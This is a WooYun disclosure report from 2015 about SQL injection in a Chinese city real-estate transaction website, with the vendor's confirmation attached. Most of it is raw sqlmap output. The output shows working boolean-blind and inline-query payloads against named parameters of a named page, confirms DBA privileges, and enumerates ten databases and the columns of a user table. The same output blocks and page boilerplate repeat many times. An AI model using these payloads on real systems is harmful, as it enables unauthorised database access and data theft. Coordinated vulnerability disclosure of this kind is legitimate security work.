某市房产网存在SQL注射【dba权限】10库 | wooyun-2015-0143644| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0143644

漏洞标题：某市房产网存在SQL注射【dba权限】10库

漏洞作者：路人甲

提交时间：2015-10-06 20:31

修复时间：2015-11-22 16:06

公开时间：2015-11-22 16:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-06：细节已通知厂商并且等待厂商处理中
2015-10-08：厂商已经确认，细节仅向厂商公开
2015-10-18：细节向核心白帽子及相关领域专家公开
2015-10-28：细节向普通白帽子公开
2015-11-07：细节向实习白帽子公开
2015-11-22：细节向公众公开

简要描述：

某市房产网存在SQL注射【dba权限】10库

详细说明：

**.**.**.**/sgfczc/
韶关房地产交易中心
**.**.**.**/sgfczc/Gongao.Asp?id=110

sqlmap identified the following injection points with a total of 631 HTTP(s) requests:
---
Parameter: PriceBegin (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: HousePlace=88952634&AreaEnd=88952634&YearBegin=88952634&YearEnd=88952634&PriceBegin=88952634) AND 1781=1781 AND (5387=5387&PriceEnd=88952634&AtFloorBegin=88952634&AtFloorEnd=88952634&SumFloorBegin=88952634&SumFloorEnd=88952634&DateBegin=88952634&DateEnd=88952634&chart=0&submit=D:\Python27\sqlmapB3 %EF%BF%BD%EF%BF%BD&district=88952634&housetype=88952634&UserFor=88952634&IsFitment=88952634&InfoFrom=88952634&AreaBegin=8895263
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: PriceBegin (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: HousePlace=88952634&AreaEnd=88952634&YearBegin=88952634&YearEnd=88952634&PriceBegin=88952634) AND 1781=1781 AND (5387=5387&PriceEnd=88952634&AtFloorBegin=88952634&AtFloorEnd=88952634&SumFloorBegin=88952634&SumFloorEnd=88952634&DateBegin=88952634&DateEnd=88952634&chart=0&submit=D:\Python27\sqlmapB3 %EF%BF%BD%EF%BF%BD&district=88952634&housetype=88952634&UserFor=88952634&IsFitment=88952634&InfoFrom=88952634&AreaBegin=8895263
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: PriceBegin (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: HousePlace=88952634&AreaEnd=88952634&YearBegin=88952634&YearEnd=88952634&PriceBegin=88952634) AND 1781=1781 AND (5387=5387&PriceEnd=88952634&AtFloorBegin=88952634&AtFloorEnd=88952634&SumFloorBegin=88952634&SumFloorEnd=88952634&DateBegin=88952634&DateEnd=88952634&chart=0&submit=D:\Python27\sqlmapB3 %EF%BF%BD%EF%BF%BD&district=88952634&housetype=88952634&UserFor=88952634&IsFitment=88952634&InfoFrom=88952634&AreaBegin=8895263
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5
current user is DBA:    True
sqlmap identified the following injection points with a total of 67 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] dbtest
[*] distribution
[*] kaoqin
[*] master
[*] model
[*] msdb
[*] OracleToSQL
[*] sgfczc
[*] tempdb
[*] uKey
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] dbtest
[*] distribution
[*] kaoqin
[*] master
[*] model
[*] msdb
[*] OracleToSQL
[*] sgfczc
[*] tempdb
[*] uKey
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] dbtest
[*] distribution
[*] kaoqin
[*] master
[*] model
[*] msdb
[*] OracleToSQL
[*] sgfczc
[*] tempdb
[*] uKey
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] dbtest
[*] distribution
[*] kaoqin
[*] master
[*] model
[*] msdb
[*] OracleToSQL
[*] sgfczc
[*] tempdb
[*] uKey
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
current user is DBA:    True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] dbtest
[*] distribution
[*] kaoqin
[*] master
[*] model
[*] msdb
[*] OracleToSQL
[*] sgfczc
[*] tempdb
[*] uKey
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: uKey
[38 tables]
+-------------------------------------------------------------------------------------+
| InitKey                                                                             |
| MSdynamicsnapshotjobs                                                               |
| MSdynamicsnapshotviews                                                              |
| MSmerge_agent_parameters                                                            |
| MSmerge_altsyncpartners                                                             |
| MSmerge_articlehistory                                                              |
| MSmerge_conflicts_info                                                              |
| MSmerge_contents                                                                    |
| MSmerge_current_partition_mappings                                                  |
| MSmerge_dynamic_snapshots                                                           |
| MSmerge_errorlineage                                                                |
| MSmerge_generation_partition_mappings                                               |
| MSmerge_genhistory                                                                  |
| MSmerge_history                                                                     |
| MSmerge_identity_range                                                              |
| MSmerge_log_files                                                                   |
| MSmerge_metadataaction_request                                                      |
| MSmerge_partition_groups                                                            |
| MSmerge_past_partition_mappings                                                     |
| MSmerge_repl_view_26AF8D2DE3E04EAEBFC62EFCD9936354_AADD3F3A61E046BDBAF39B363B37F249 |
| MSmerge_replinfo                                                                    |
| MSmerge_sessions                                                                    |
| MSmerge_settingshistory                                                             |
| MSmerge_supportability_settings                                                     |
| MSmerge_tombstone                                                                   |
| MSrepl_errors                                                                       |
| Users                                                                               |
| sysmergearticles                                                                    |
| sysmergeextendedarticlesview                                                        |
| sysmergepartitioninfo                                                               |
| sysmergepartitioninfoview                                                           |
| sysmergepublications                                                                |
| sysmergeschemaarticles                                                              |
| sysmergeschemachange                                                                |
| sysmergesubscriptions                                                               |
| sysmergesubsetfilters                                                               |
| sysreplservers                                                                      |
| v_Users                                                                             |
+-------------------------------------------------------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: uKey
Table: Users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| content    | non-numeric |
| department | non-numeric |
| id         | non-numeric |
| realname   | non-numeric |
| user       | non-numeric |
| username   | non-numeric |
+------------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: uKey
Table: v_Users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| content    | non-numeric |
| department | non-numeric |
| id         | non-numeric |
| realname   | non-numeric |
| user       | non-numeric |
| username   | non-numeric |
+------------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8490=8490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] dbtest
[*] distribution
[*] kaoqin
[*] master
[*] model
[*] msdb
[*] OracleToSQL
[*] sgfczc
[*] tempdb
[*] uKey

由于不能跑数据量、、、

漏洞证明：

但是数据量应该不少呀

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-10-08 16:05

厂商回复：

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据：高
攻击成本：低
造成影响：高
综合评级为：高，rank：12
正在联系相关网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0143644

漏洞标题：某市房产网存在SQL注射【dba权限】10库

相关厂商：广东省信息安全测评中心

漏洞作者：路人甲

提交时间：2015-10-06 20:31

修复时间：2015-11-22 16:06

公开时间：2015-11-22 16:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0143644

漏洞标题：某市房产网存在SQL注射【dba权限】10库

相关厂商：广东省信息安全测评中心

漏洞作者： 路人甲

提交时间：2015-10-06 20:31

修复时间：2015-11-22 16:06

公开时间：2015-11-22 16:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0143644"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云